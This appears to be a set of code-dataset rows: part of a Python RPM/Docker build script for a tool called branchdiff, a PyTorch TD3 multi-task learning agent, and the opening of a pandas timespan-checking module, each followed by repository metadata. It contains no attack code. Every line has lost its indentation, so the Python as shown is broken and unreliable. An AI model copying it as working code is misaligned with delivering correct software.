current version number of the project, TYPE: str
"""
if which(binary):
os_type = distro.linux_distribution()[0]
if os_type == 'Redhat' and which('yum'):
cmd = 'yum info ' + binary + ' 2>/dev/null | grep Version'
elif os_type == 'Redhat' and which('rpm'):
cmd = 'rpm -qi ' + binary + ' 2>/dev/null | grep Version'
elif os_type == 'Ubuntu' and which('apt'):
cmd = 'apt show ' + binary + ' 2>/dev/null | grep Version | head -n1'
try:
installed_version = subprocess.getoutput(cmd).split(':')[1].strip()
return greater_version(installed_version, __version__)
except Exception:
logger.info(
'%s: Build binary %s not installed, comparing current branch version to master branch version' %
(inspect.stack()[0][3], binary))
return greater_version(masterbranch_version(version_modpath), __version__)
def greater_version(versionA, versionB):
"""
Summary:
Compares to version strings with multiple digits and returns greater
Returns:
greater, TYPE: str
"""
try:
list_a = versionA.split('.')
list_b = versionB.split('.')
except AttributeError:
return versionA or versionB # either A or B is None
try:
for index, digit in enumerate(list_a):
if int(digit) > int(list_b[index]):
return versionA
elif int(digit) < int(list_b[index]):
return versionB
elif int(digit) == int(list_b[index]):
continue
except ValueError:
return versionA or versionB # either A or B is ''
return versionA
def increment_version(current):
"""
Returns current version incremented by 1 minor version number
"""
minor = current.split('.')[-1]
major = '.'.join(current.split('.')[:-1])
inc_minor = int(minor) + 1
return major + '.' + str(inc_minor)
def tar_archive(archive, source_dir, debug):
"""
Summary.
- Creates .tar.gz compressed archive
- Checks that file was created before exit
Returns:
Success | Failure, TYPE: bool
"""
try:
# rm any python byte-code artifacts
clean(source_dir, debug)
with tarfile.open(archive, "w:gz") as tar:
tar.add(source_dir, arcname=os.path.basename(source_dir))
if os.path.exists(archive):
return True
except OSError:
logger.exception(
'{}: Unable to create tar archive {}'.format(inspect.stack()[0][3], archive))
except Exception as e:
logger.exception(
'%s: Unknown problem while creating tar archive %s:\n%s' %
(inspect.stack()[0][3], archive, str(e)))
return False
def builddir_structure(param_dict, force):
"""
Summary.
- Updates path in binary exectuable
- Updates
Args:
:root (str): full path to root directory of the git project
:builddir (str): name of current build directory which we need to populate
Vars:
:lib_path (str): src path to library modules in project root
:builddir_path (str): dst path to root of the current build directory
(/<path>/branchdiff-1.X.X dir)
Returns:
Success | Failure, TYPE: bool
"""
root = git_root()
build_root = TMPDIR
arrow = yl + Colors.BOLD + '-->' + rst
# files
specfile = param_dict['SpecFile']['Name']
compfile = param_dict['BashCompletion']
builddir = param_dict['SpecFile']['BuildDirName']
# full paths
rpm_src = root + '/packaging/rpm'
builddir_path = build_root + '/' + builddir
lib_path = root + '/' + 'core'
try:
stdout_message(f'Assembling build directory artifacts in {bn + builddir + rst}')
# create build directory
if os.path.exists(builddir_path):
rmtree(builddir_path)
os.makedirs(builddir_path)
stdout_message(
message='Created:\t{}'.format(yl + builddir_path + rst),
prefix='OK')
# place main bin to builddir
if not os.path.exists(builddir_path + '/' + PROJECT_BIN):
binary_src = root + '/' + PROJECT_BIN
binary_dst = builddir_path + '/' + PROJECT_BIN
copyfile(binary_src, binary_dst)
stdout_message(
message='Copied: {} {} {}'.format(lk + binary_src + rst, arrow, lk + binary_dst + rst),
prefix='OK')
# place library dependencies
for libfile in os.listdir(lib_path):
if libfile.endswith('.pyc') or libfile.endswith('.pyo'):
continue
else:
lib_src = lib_path + '/' + libfile
lib_dst = builddir_path + '/' + libfile
copyfile(lib_src, lib_dst)
stdout_message(
message='Copied: {} {} {}'.format(lk + lib_src + rst, arrow, lk + lib_dst + rst),
prefix='OK')
# place specfile in build_root
spec_dst = build_root + '/' + specfile
if os.path.exists(spec_dst):
os.remove(spec_dst)
copyfile(rpm_src + '/' + specfile, spec_dst)
# verify build spec placement
if os.path.exists(spec_dst):
stdout_message(
message='Copied: {} {} {}'.format(
lk + rpm_src + '/' + specfile + rst, arrow, lk + spec_dst + rst),
prefix='OK')
# place bash completion artifacts
comp_src = root + '/' + 'bash' + '/' + compfile
comp_dst = builddir_path + '/' + compfile
if os.path.exists(comp_src):
if os.path.exists(comp_dst):
os.remove(comp_dst)
copyfile(comp_src, comp_dst)
# verify build spec placement
if os.path.exists(comp_dst):
stdout_message(
message='Copied: {} {} {}'.format(
lk + comp_src + rst, arrow, lk + comp_dst + rst),
prefix='OK')
except OSError as e:
logger.exception(
'{}: Problem creating dirs on local fs'.format(inspect.stack()[0][3]))
return False
return True
def build_package(build_root, builddir):
"""
Summary.
Creates final os installable package for current build, build version
Returns:
Success | Failure, TYPE: bool
"""
try:
pwd = os.getcwd()
if os.path.exists(builddir):
os.chdir(builddir)
cmd = 'rpmbuild -ba SPECS/branchdiff.spec'
stdout_message('Building {}... '.format(bn + builddir + rst))
stdout_message(subprocess.getoutput(cmd))
os.chdir(pwd)
else:
logger.warning(
'Build directory {} not found. Failed to create .deb package'.format(builddir))
os.chdir(pwd)
return False
except OSError as e:
logger.exception(
'{}: Error during os package creation: {}'.format(inspect.stack()[0][3], e))
return False
except Exception as e:
logger.exception(
'{}: Unknown Error during os package creation: {}'.format(inspect.stack()[0][3], e))
return False
return True
def builddir_content_updates(param_dict, osimage, version, debug):
"""
Summary:
Updates builddir contents:
- main exectuable has path to libraries updated
- builddir DEBIAN/control file version is updated to current
- updates the version.py file if version != to __version__
contained in the file. This oaccurs if user invokes the -S /
--set-version option
Args:
:root (str): project root full fs path
:builddir (str): dirname of the current build directory
:binary (str): name of the main exectuable
:version (str): version label provided with --set-version parameter. None otherwise
Returns:
Success | Failure, TYPE: bool
"""
root = git_root()
build_root = TMPDIR
rpm_src = root + '/packaging/rpm'
project_dirname = root.split('/')[-1]
major = '.'.join(version.split('.')[:2])
minor = version.split('.')[-1]
# files
specfile = param_dict['SpecFile']['Name']
builddir = param_dict['SpecFile']['BuildDirName']
version_module = param_dict['VersionModule']
dockeruser = param_dict['DockerUser']
project_url = param_dict['ProjectUrl']
# full paths
builddir_path = build_root + '/' + builddir
binary_path = builddir_path + '/' + PROJECT_BIN
lib_src = root + '/' + 'core'
# dependencies
deplist = None
for dep in param_dict['DependencyList']:
if deplist is None:
deplist = str(dep)
else:
deplist = deplist + ', ' + str(dep)
try:
stdout_message(
'Generating build spec file and build artifacts in %s' %
yl + builddir_path + rst
)
# main exec bin
with open(binary_path) as f1:
f2 = f1.readlines()
for index, line in enumerate(f2):
if line.startswith('pkg_lib='):
newline = 'pkg_lib=' + '\"' + '/usr/local/lib/' + PROJECT + '\"\n'
f2[index] = newline
elif line.startswith('LOG_DIR='):
logline = 'LOG_DIR=' + '\"' + '/var/log' + '\"\n'
f2[index] = logline
f1.close()
# rewrite bin
with open(binary_path, 'w') as f3:
f3.writelines(f2)
path = binary_path
stdout_message('Bin {} successfully updated.'.format(yl + path + rst))
# rewrite version file with current build ver
with open(builddir_path + '/' + version_module, 'w') as f4:
f3 = ['__version__=\"' + version + '\"\n']
f4.writelines(f3)
path = builddir_path + '/' + version_module
stdout_message('Module {} successfully updated.'.format(yl + path + rst))
# rewrite git project version file with current build version in case delta
with open(lib_src + '/' + version_module, 'w') as f5:
f4 = ['__version__=\"' + version + '\"\n']
f5.writelines(f4)
path = '../' + project_dirname + (lib_src + '/' + version_module)[len(root):]
stdout_message('Module {} successfully updated.'.format(yl + path + rst))
if os.path.exists(build_root + '/' + specfile):
# update specfile - major version
for line in fileinput.input([build_root + '/' + specfile], inplace=True):
print(line.replace('MAJOR_VERSION', major), end='')
stdout_message(f'Updated {specfile} with MAJOR_VERSION', prefix='OK')
# update specfile - minor version
for line in fileinput.input([build_root + '/' + specfile], inplace=True):
print(line.replace('MINOR_VERSION', minor), end='')
stdout_message(f'Updated {specfile} with MINOR_VERSION', prefix='OK')
# update specfile - DOCKERUSER
for line in fileinput.input([build_root + '/' + specfile], inplace=True):
print(line.replace('DOCKERUSER', dockeruser), end='')
stdout_message(f'Updated {specfile} with DOCKERUSER ({dockeruser})', prefix='OK')
# update specfile - Dependencies
for line in fileinput.input([build_root + '/' + specfile], inplace=True):
print(line.replace('DEPLIST', deplist), end='')
stdout_message(f'Updated {specfile} with Dependencies ({deplist})', prefix='OK')
# update specfile - major version
for line in fileinput.input([build_root + '/' + specfile], inplace=True):
print(line.replace('PROJECT_URL', project_url), end='')
stdout_message(f'Updated {specfile} with PROJECT_URL', prefix='OK')
else:
stdout_message(
message=f'{specfile} not found in build directory. Cannot update... halting build.',
prefix='WARN')
sys.exit(1)
# rm residual installation files from build directory
clean(builddir_path, debug)
except OSError as e:
logger.exception(
'%s: Problem while updating builddir contents: %s' %
(inspect.stack()[0][3], str(e)))
return False
return True
def cp_dockerfiles(src, dst):
"""
Copy dockerfiles and associated build artifacts to build_root
>> NOT CURRENTLY USED <<
"""
# place docker build script
script_src = src + '/' + dockerscript
script_dst = build_root + '/' + dockerscript
build_list = os.listdir(src)
for file in build_list:
copyfile(file, dst + '/' + file)
# cp Dockerfile to build root
copyfile(
docker_path + '/' + 'Dockerfile',
builddir_path + '/' + 'Dockerfile'
)
# verify build spec placement
stdout_message(
message='Copied: {} {} {}'.format(
lk + script_src + rst, arrow, lk + script_dst + rst),
prefix='OK')
return build_list
def container_running(cid, debug=False):
"""
Summary:
Verifies if a container is activly running
Args:
:cid (str): Container name or hex identifier
:dclient (object): global docker client
Returns:
True (running) | False (stopped)
TYPE: bool
"""
success_msg = f'Container {cid} running'
try:
container = dclient.containers.get(cid)
if container.status == 'running':
if debug:
stdout_message(success_msg, prefix='OK')
return True
except Exception:
if cid in subprocess.getoutput('docker ps'):
stdout_message(success_msg, prefix='OK')
return True
else:
stdout_message(f'Container {cid} stopped', prefix='WARN')
return False
def display_package_contents(rpm_path, contents):
"""
Summary:
Output newly built package contents.
Args:
:build_root (str): location of newly built rpm package
:version (str): current version string, format: '{major}.{minor}.{patch num}'
Returns:
Success | Failure, TYPE: bool
"""
tab = '\t'.expandtabs(2)
tab4 = '\t'.expandtabs(4)
width = 90
package = os.path.split(rpm_path)[1]
path, discard = os.path.split(contents)
pwd = os.getcwd()
os.chdir('.') if not path else os.chdir(path)
with open(contents) as f1:
unformatted = f1.readlines()
# title header and subheader
header = '\n\t\tPackage Contents: ' + bd + package + rst + '\n'
print(header)
subheader = tab + 'Permission' + tab + ' Owner/Group' + '\t' + 'ctime' \
+ '\t'.expandtabs(8) + 'File'
print(subheader)
# divider line
list(filter(lambda x: print('-', end=''), range(0, width + 1))), print('\r')
# content
for line in unformatted:
permissions = [tab + line.split()[0]]
raw = tab4 + 'root root'
ctime = line.split()[5:8]
f_ctime = tab4 + ''.join([x + ' ' for x in ctime])
content_path = tab4 + yl + line.split()[-1] + rst
fline = permissions[0] + raw + f_ctime + content_path
print(fline)
print('\n')
os.chdir(pwd)
return True
def docker_daemon_up():
"""
Summary:
Determines if docker installed and running by
evaluating the exit code of docker images cmd
Returns:
True (running) | False, TYPE: bool
"""
cmd = 'docker images >/dev/null 2>&1; echo $?'
if which('docker') and int(subprocess.getoutput(cmd)) == 0:
return True
else:
stdout_message('Docker engine not running or not accessible', prefix='WARN')
return False
def docker_init(src, builddir, osimage, param_dict, debug):
"""
Summary:
Creates docker image and container
Args:
Returns:
Container id (Name) | Failure (None)
"""
imagename = osimage + ':' + param_dict['DockerImage'] # image name
cname = param_dict['DockerContainer'] # container id
host_mnt = VOLMNT # host volume mount point
container_mnt = CONTAINER_VOLMNT # container volume internal mnt pt
docker_user = 'builder'
bash_cmd = '/bin/sleep 30'
buildscript = 'docker-buildrpm.sh'
# copy buildscript to directory where build files assembled
copyfile(src + '/' + buildscript, builddir + '/' + buildscript)
try:
# create host mount for container volume
if not os.path.exists(host_mnt):
os.makedirs(host_mnt)
stdout_message(f'Created host mount {host_mnt} for container volume')
# if image rpmbuild not exist, create
try:
image = dclient.images.get(imagename)
if image:
stdout_message('Image already exists. Creating Container...')
except Exception:
# create new docker image
os.chdir(src)
cmd = 'docker build -t {} . '.format(imagename)
subprocess.call([cmd], shell=True, cwd=src)
stdout_message('Built image', prefix='OK')
# start container detached
container = dclient.containers.run(
name=cname,
image=imagename,
command=bash_cmd,
volumes={host_mnt: {'bind': container_mnt, 'mode': 'rw'}},
user=docker_user,
detach=True
)
# verify container is running
if not container_running(cname):
stdout_message(f'Container {cname} not started - abort', prefix='WARN')
return False
# copy build files to container
stdout_message('Begin cp files into container')
# copy files from temporary build directory to container
os.chdir(builddir)
buildfile_list = list(
filter(
lambda x: x.endswith('.tar.gz') or x.endswith('.spec') or x.endswith('.sh'), os.listdir('.')
)
)
if debug:
print(f'buildfile_list contains:\n\n\t%s' % export_json_object(buildfile_list))
print(f'osimage is: {osimage}')
print(f'imagename is: {imagename}')
print(f'container name is: {container.name}')
for file in buildfile_list:
# local fs >> container:/home/builder
cmd = f'docker cp {file} {container.name}:/home/builder/{file}'
# status
if not subprocess.getoutput(cmd):
stdout_message(f'{file} copied to container {container.name} successfully')
else:
stdout_message(
f'Problem copying {file} to container {container.name}',
prefix='WARN'
)
# exec rpmbuild script
cmd = f'docker exec -i {container.name} sh -c \'cd /home/builder && bash {buildscript}\''
stdout_message(subprocess.getoutput(cmd))
if container_running(container.name):
return container
except OSError as e:
logger.exception(
'%s: Problem while updating builddir contents: %s' %
(inspect.stack()[0][3], str(e)))
return None
def main(setVersion, environment, package_configpath, force=False, debug=False):
"""
Summary:
Create build directories, populate contents, update contents
Args:
:setVersion (str): version number of rpm created
:environment (str):
:package_configpath (str): full path to json configuration file
:data (dict): build parameters for rpm build process
:force (bool): If True, overwrites any pre-existing build artifacts
Returns:
Success | Failure, TYPE: bool
"""
# all globals declared here
global PROJECT_BIN
PROJECT_BIN = 'branchdiff'
global PROJECT_ROOT
PROJECT_ROOT = git_root()
global SCRIPT_DIR
SCRIPT_DIR = PROJECT_ROOT + '/' + 'scripts'
global BUILD_ROOT
BUILD_ROOT = TMPDIR
global RPM_SRC
RPM_SRC = PROJECT_ROOT + '/packaging/rpm'
global LIB_DIR
LIB_DIR = PROJECT_ROOT + '/' + 'core'
global CURRENT_VERSION
CURRENT_VERSION = current_version(PROJECT_BIN, LIB_DIR + '/' 'version.py')
# sort out version numbers, forceVersion is overwrite of pre-existing build artifacts
global VERSION
if setVersion:
VERSION = setVersion
elif CURRENT_VERSION:
VERSION = increment_version(CURRENT_VERSION)
else:
stdout_message('Could not determine current {} version'.format(bd + PROJECT + rst))
sys.exit(exit_codes['E_DEPENDENCY']['Code'])
# log
stdout_message(f'Current version of last build: {bd + CURRENT_VERSION + rst}')
stdout_message(f'Version to be used for this build: {act + VERSION + rst}')
# create initial binary working dir
BUILDDIRNAME = PROJECT + '-' + '.'.join(VERSION.split('.')[:2])
# sub in current values
parameter_obj = ParameterSet(package_configpath, VERSION)
vars = parameter_obj.create()
VERSION_FILE = vars['VersionModule']
if debug:
print(json.dumps(vars, indent=True, sort_keys=True))
r_struture = builddir_structure(vars, VERSION)
r_updates = builddir_content_updates(vars, environment, VERSION, debug)
# create tar archive
target_archive = BUILD_ROOT + '/' + PROJECT_BIN + '-' + VERSION + '.tar.gz'
source_dir = BUILD_ROOT + '/' + BUILDDIRNAME
r_tarfile = tar_archive(target_archive, source_dir, debug)
# launch docker container and execute final build steps
if r_struture and r_updates and r_tarfile:
# status
msg = yl + BUILD_ROOT + '/' + target_archive + rst
stdout_message('tgz archive built: %s' % msg)
# trigger docker build based on environment:
container = docker_init(
PROJECT_ROOT + '/packaging/docker/' + environment,
BUILD_ROOT,
environment,
vars,
debug
)
if container:
return postbuild(PROJECT_ROOT, container, RPM_SRC, SCRIPT_DIR, VERSION_FILE, VERSION)
return False
def options(parser, help_menu=False):
"""
Summary:
parse cli parameter options
Returns:
TYPE: argparse object, parser argument set
"""
parser.add_argument("-b", "--build", dest='build', default=False, action='store_true', required=False)
parser.add_argument("-D", "--debug", dest='debug', default=False, action='store_true', required=False)
parser.add_argument("-d", "--distro", dest='distro', default='centos7', nargs='?', type=str, required=False)
parser.add_argument("-F", "--force", dest='force', default=False, action='store_true', required=False)
parser.add_argument("-p", "--parameter-file", dest='parameter_file', default='.rpm.json', nargs='?', required=False)
parser.add_argument("-s", "--set-version", dest='set', default=None, nargs='?', type=str, required=False)
parser.add_argument("-h", "--help", dest='help', default=False, action='store_true', required=False)
return parser.parse_args()
def is_installed(binary):
"""
Verifies if program installed on Redhat-based Linux system
"""
cmd = 'rpm -qa | grep ' + binary
return True if subprocess.getoutput(cmd) else False
def ospackages(pkg_list):
"""Summary
Install OS Package Prerequisites
Returns:
Success | Failure, TYPE: bool
"""
try:
for pkg in pkg_list:
if is_installed(pkg):
logger.info(f'{pkg} binary is already installed - skip')
continue
elif which('yum'):
cmd = 'sudo yum install ' + pkg + ' 2>/dev/null'
print(subprocess.getoutput(cmd))
elif which('dnf'):
cmd = 'sudo dnf install ' + pkg + ' 2>/dev/null'
print(subprocess.getoutput(cmd))
else:
logger.warning(
'%s: Dependent OS binaries not installed - package manager not identified' %
inspect.stack()[0][3])
except OSError as e:
logger.exception('{}: Problem installing os package {}'.format(inspect.stack()[0][3], pkg))
return False
return True
def prebuild(builddir, libsrc, volmnt, parameter_file):
"""Summary:
Prerequisites and dependencies for build execution
Returns:
Success | Failure, TYPE: bool
"""
def preclean(dir, artifact=''):
"""Cleans residual build artifacts by removing """
try:
if artifact:
if os.path.exists(libsrc + '/' + artifact):
rmtree(libsrc + '/' + artifact) # clean artifact from inside an existing dir
elif os.path.exists(dir):
rmtree(dir) # rm entire directory
except OSError as e:
logger.exception(
'%s: Error while cleaning residual build artifacts: %s' %
(inspect.stack()[0][3], str(e)))
return False
return True
version_module = json.loads(read(parameter_file))['VersionModule']
try:
if preclean(builddir) and preclean(volmnt) and preclean(libsrc, '__pycache__'):
stdout_message(f'Removed pre-existing build artifacts ({builddir}, {volmnt})')
os.makedirs(builddir)
os.makedirs(volmnt)
root = git_root()
src = root + '/core' + '/' + version_module
dst = root + '/scripts' + '/' + version_module
# deal with leftover build artifacts
if os.path.exists(dst):
os.remove(dst)
r_cf = copyfile(src, dst)
# import version module
global __version__
from version import __version__
if r_cf and __version__ and docker_daemon_up():
return True
except Exception as e:
logger.exception(
'{}: Failure to import __version__ parameter'.format(inspect.stack()[0][3])
)
return False
def locate_artifact(filext, origin):
"""
Summary.
Finds rpm file object after creation
Args:
:filext (str): File extension searching for (".rpm")
:origin (str): Starting directory for recursive search
Returns:
full path to rpm file | None if not found
"""
for root, dirs, files in os.walk(origin):
for file in files:
if file.endswith(filext):
return os.path.abspath(os.path.join(root, file))
return None
def postbuild(root, container, rpm_root, scripts_dir, version_module, version):
"""
Summary:
Post-build clean up
Args:
:container (object): Docker container object
:rpm_root (str): target dir for rpm package files
:script_dir (str): directory where scripts
:version_module (str): name of module containing version number
:version (str): current version label (Example: 1.6.8)
Returns:
Success | Failure, TYPE: bool
"""
project_dirname = root.split('/')[-1]
major = '.'.join(version.split('.')[:2])
minor = version.split('.')[-1]
volmnt = VOLMNT
delete = True
try:
# cp rpm created to repo
package = locate_artifact('.rpm', volmnt)
if package:
copyfile(locate_artifact('.rpm', volmnt), rpm_root)
package_path = rpm_root + '/' + os.path.split(package)[1]
# rpm contents text file
contents = locate_artifact('.txt', volmnt)
# stop and rm container
cmd = f'docker stop {container.name}'
subprocess.getoutput(cmd)
# status
if not container_running(container.name):
stdout_message(f'{container.name} successfully halted', prefix='OK')
cmd = f'docker rm {container.name}'
subprocess.getoutput(cmd)
# remove temp version module copied to scripts dir
if os.path.exists(scripts_dir + '/' + version_module):
os.remove(scripts_dir + '/' + version_module)
# rewrite version file with 67rrent build version
with open(root + '/core/' + version_module, 'w') as f3:
f2 = ['__version__=\"' + version + '\"\n']
f3.writelines(f2)
path = project_dirname + (root + '/core/' + version_module)[len(root):]
stdout_message(
'{}: Module {} successfully updated.'.format(inspect.stack()[0][3], yl + path + rst)
)
except OSError as e:
logger.exception('{}: Postbuild clean up failure'.format(inspect.stack()[0][3]))
return ''
return package_path, contents
class ParameterSet():
"""Recursion class for processing complex dictionary schema."""
def __init__(self, parameter_file, version):
"""
Summary.
Retains major and minor version numbers + parameters
in json form for later use
Args:
:parameter_file (str): path to json file obj containing
parameter keys and values
:version (str): current build version
"""
self.parameter_dict = json.loads(read(parameter_file))
self.version = version
self.major = '.'.join(self.version.split('.')[:2])
self.minor = self.version.split('.')[-1]
def create(self, parameters=None):
"""
Summary.
Update parameter dict with current values appropriate
for the active build
Args:
:parameters (dict): dictionary of all parameters used to gen rpm
:version (str): the version of the current build, e.g. 1.6.7
Returns:
parameters, TYPE: dict
"""
if parameters is None:
parameters = self.parameter_dict
for k, v in parameters.items():
if isinstance(v, dict):
self.create(v)
else:
if k == 'Version':
parameters[k] = self.major
elif k == 'Release':
parameters[k] = self.minor
elif k == 'Source':
parameters[k] = PROJECT + '-' + self.major + '.' + self.minor + '.tar.gz'
elif k == 'BuildDirName':
parameters[k] = PROJECT + '-' + self.major
return parameters
def valid_version(parameter, min=0, max=100):
"""
Summary.
User input validation. Validates version string made up of integers.
Example: '1.6.2'. Each integer in the version sequence must be in
a range of > 0 and < 100. Maximum version string digits is 3
(Example: 0.2.3 )
Args:
:parameter (str): Version string from user input
:min (int): Minimum allowable integer value a single digit in version
string provided as a parameter
:max (int): Maximum allowable integer value a single digit in a version
string provided as a parameter
Returns:
True if parameter valid or None, False if invalid, TYPE: bool
"""
# type correction and validation
if parameter is None:
return True
elif isinstance(parameter, int):
return False
elif isinstance(parameter, float):
parameter = str(parameter)
component_list = parameter.split('.')
length = len(component_list)
try:
if length <= 3:
for component in component_list:
if isinstance(int(component), int) and int(component) in range(min, max + 1):
continue
else:
return False
except ValueError as e:
return False
return True
def init_cli():
"""Collect parameters and call main."""
try:
parser = argparse.ArgumentParser(add_help=False)
args = options(parser)
except Exception as e:
help_menu()
stdout_message(str(e), 'ERROR')
return exit_codes['E_MISC']['Code']
if not os.path.isfile(args.parameter_file):
stdout_message(
message='Path to parmeters file not found. Abort',
prefix='WARN'
)
return exit_codes['E_DEPENDENCY']['Code']
if args.debug:
print(debug_header)
stdout_message(
message='Set (--set-version):\t{}'.format(args.set),
prefix='DBUG'
)
stdout_message(
message='Build Flag (--build):\t{}'.format(args.build),
prefix='DBUG'
)
stdout_message(
message='Docker Image (--distro):\t{}'.format(args.distro),
prefix='DBUG'
)
stdout_message(
message='Parameter File (--parameters):\t{}'.format(args.parameter_file),
prefix='DBUG'
)
stdout_message(
message='Debug Flag:\t\t{}'.format(args.debug),
prefix='DBUG'
)
if len(sys.argv) == 1:
help_menu()
return exit_codes['EX_OK']['Code']
elif args.help:
help_menu()
return exit_codes['EX_OK']['Code']
elif args.build:
libsrc = git_root() + '/' + 'core'
if valid_version(args.set) and prebuild(TMPDIR, libsrc, VOLMNT, git_root() + '/' + args.parameter_file):
package, contents = main(
setVersion=args.set,
environment=args.distro,
package_configpath=git_root() + '/' + args.parameter_file,
force=args.force,
debug=args.debug
)
if package:
stdout_message(f'New package created: {yl + package + rst}')
stdout_message(f'RPM build process completed successfully. End', prefix='OK')
if contents:
display_package_contents(package, contents)
else:
stdout_message(
message=f'Unable to locate a rpm contents file in {build_root}.',
prefix='WARN')
return False
return exit_codes['EX_OK']['Code']
else:
stdout_message(
'{}: Problem creating rpm installation package. Exit'.format(inspect.stack()[0][3]),
prefix='WARN',
severity='WARNING'
)
return exit_codes['E_MISC']['Code']
elif not valid_version(args.set):
stdout_message(
'You must enter a valid version when using --set-version parameter. Ex: 1.6.3',
prefix='WARN',
severity='WARNING'
)
return exit_codes['E_DEPENDENCY']['Code']
else:
logger.warning('{} Failure in prebuild stage'.format(inspect.stack()[0][3]))
return exit_codes['E_DEPENDENCY']['Code']
return True
sys.exit(init_cli())
| 33.01859 | 136 | 0.572853 | 1,689 | 0.039623 | 0 | 0 | 0 | 0 | 0 | 0 | 17,145 | 0.40221 |
2bcb666bd56d9bf21750baa9263c491c8e80469a | 4,731 | py | Python | agent/td3mt.py | xuzhiyuan1528/KTM-DRL | a98e7c3b74fc2cd1bd999a3bbf8f8ad071e0269a | [
"Apache-2.0"
] | 10 | 2020-11-01T05:29:31.000Z | 2022-03-12T08:42:48.000Z | agent/td3mt.py | xuzhiyuan1528/KTM-DRL | a98e7c3b74fc2cd1bd999a3bbf8f8ad071e0269a | [
"Apache-2.0"
] | null | null | null | agent/td3mt.py | xuzhiyuan1528/KTM-DRL | a98e7c3b74fc2cd1bd999a3bbf8f8ad071e0269a | [
"Apache-2.0"
] | 4 | 2020-11-01T05:16:51.000Z | 2021-02-22T22:55:14.000Z | import torch
import torch.nn.functional as F
from agent.td3 import TD3
class TD3MT(TD3):
def __init__(self,
state_dim,
action_dim,
max_action,
num_env,
discount=0.99,
tau=0.005,
policy_noise=0.2,
noise_clip=0.5,
policy_freq=2,
cuda_index=None
):
super().__init__(state_dim, action_dim, max_action,
discount, tau,
policy_noise, noise_clip,
policy_freq, cuda_index)
self.it = 0
self.total_it = [0 for _ in range(num_env)]
self.state_dim = state_dim
self.action_dim = action_dim
self.actor_optimizer_online = torch.optim.Adam(self.actor.parameters(), lr=3e-4)
self.critic_optimizer_online = torch.optim.Adam(self.critic.parameters(), lr=3e-4)
def save(self, filename):
super().save(filename)
torch.save(self.actor_optimizer_online.state_dict(), filename + "_actor_optimizer_online.pt")
torch.save(self.critic_optimizer_online.state_dict(), filename + "_critic_optimizer_online.pt")
def load(self, filename):
super().load(filename)
self.actor_optimizer_online.load_state_dict(torch.load(filename + "_actor_optimizer_online.pt"))
self.critic_optimizer_online.load_state_dict(torch.load(filename + "_critic_optimizer_online.pt"))
def pad_state(self, state):
return torch.cat([state,
torch.zeros(state.shape[0], self.state_dim - state.shape[1]).to(self.device)],
dim=1)
def pad_action(self, action):
return torch.cat([action,
torch.zeros(action.shape[0], self.action_dim - action.shape[1]).to(self.device)],
dim=1)
def train_mt(self, idx, teacher, replay, batch_size=100, is_offline=True):
self.total_it[idx] += 1
state, action, next_state, reward, not_done = replay.sample(batch_size)
state_dim_org = state.shape[1]
action_dim_org = action.shape[1]
with torch.no_grad():
state_pad = self.pad_state(state)
action_pad = self.pad_action(action)
if is_offline:
teacher_q1, teacher_q2 = teacher.critic(state, action)
else:
next_state_pad = self.pad_state(next_state)
next_action = self.actor_target(next_state_pad)
noise = (
torch.rand_like(next_action) * self.policy_noise
).clamp(-self.noise_clip, self.noise_clip)
next_action = (next_action + noise).clamp(-self.max_action, self.max_action)
next_action = next_action[:, :action_dim_org]
next_action_pad = self.pad_action(next_action)
target_q1, target_q2 = self.critic_target(next_state_pad, next_action_pad)
target_q = torch.min(target_q1, target_q2)
target_q = reward + not_done * self.discount * target_q
current_q1, current_q2 = self.critic(state_pad, action_pad)
if is_offline:
critic_loss = F.mse_loss(current_q1, teacher_q1) + F.mse_loss(current_q2, teacher_q2)
self.critic_optimizer.zero_grad()
critic_loss.backward()
self.critic_optimizer.step()
else:
critic_loss = F.mse_loss(current_q1, target_q) + F.mse_loss(current_q2, target_q)
self.critic_optimizer_online.zero_grad()
critic_loss.backward()
self.critic_optimizer_online.step()
loss = [None, critic_loss.cpu().data.numpy()]
if is_offline or self.total_it[idx] % self.policy_freq == 0:
current_action = self.actor(state_pad)[:, :action_dim_org]
current_action_pad = self.pad_action(current_action)
actor_loss_t = -teacher.critic.Q1(state, current_action)
if is_offline:
actor_loss = actor_loss_t.mean()
self.actor_optimizer.zero_grad()
actor_loss.backward()
self.actor_optimizer.step()
else:
actor_loss = -self.critic.Q1(state_pad, current_action_pad)
actor_loss = 1.0 * actor_loss + 1.0 * actor_loss_t
actor_loss = actor_loss.mean()
self.actor_optimizer_online.zero_grad()
actor_loss.backward()
self.actor_optimizer_online.step()
self.update_target_network()
loss[0] = actor_loss.cpu().data.numpy()
return loss
| 37.848 | 107 | 0.589939 | 4,656 | 0.984147 | 0 | 0 | 0 | 0 | 0 | 0 | 114 | 0.024096 |
2bcc0cc4e0ece32defaf1db3f2ced89cc0efe672 | 9,929 | py | Python | chrony/timespans.py | gtnx/chrony | e073f5683a395cd3732a2974f6509a7298dc4848 | [
"MIT"
] | 3 | 2015-11-06T15:55:45.000Z | 2016-02-01T14:37:14.000Z | chrony/timespans.py | gtnx/chrony | e073f5683a395cd3732a2974f6509a7298dc4848 | [
"MIT"
] | 1 | 2015-11-03T15:22:08.000Z | 2015-11-03T15:22:08.000Z | chrony/timespans.py | gtnx/chrony | e073f5683a395cd3732a2974f6509a7298dc4848 | [
"MIT"
] | 1 | 2015-11-03T15:12:48.000Z | 2015-11-03T15:12:48.000Z | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import pandas as pd
from .exceptions import BadLengthsError, BegPosteriorToEndError, OverlapError, NotSortedError, IntegrityError, HasTimezoneError
def audit_timespan(begs, ends):
if begs.empty and ends.empty:
return
if begs.dt.tz or ends.dt.tz:
raise HasTimezoneError
if len(begs) != len(ends):
raise BadLengthsError
for beg, end in zip(begs, ends):
if beg > end:
raise BegPosteriorToEndError
if (begs < begs.shift()).sum():
raise NotSortedError
if (ends.shift() > begs)[1:].sum():
raise OverlapError
def audit_timespan_print(begs, ends):
if begs.dt.tz or ends.dt.tz:
print('')
print('TimeZoneError')
if len(begs) != len(ends):
print('')
print('TimeZoneError')
for beg, end in zip(begs, ends):
if beg > end:
print('')
print('beg=', beg, ' posterior to end=', end)
for i in range(len(begs) - 1):
if begs[i + 1] < begs[i]:
print('Events are not sorted')
if ends[i] > begs[i + 1]:
print('At row %s end %s is posterior to %s by %s' % (i, ends[i], begs[i + 1], ends[i] - begs[i + 1]))
def describe_timespan(begs, ends):
if begs.empty and ends.empty:
print('Empty series')
return
contiguous_transitions = (begs == ends.shift()).sum()
coverage = (ends - begs).sum().total_seconds() / (ends[len(ends) - 1] - begs[0]).total_seconds()
metrics = (
('beg', begs[0]),
('count', len(begs)),
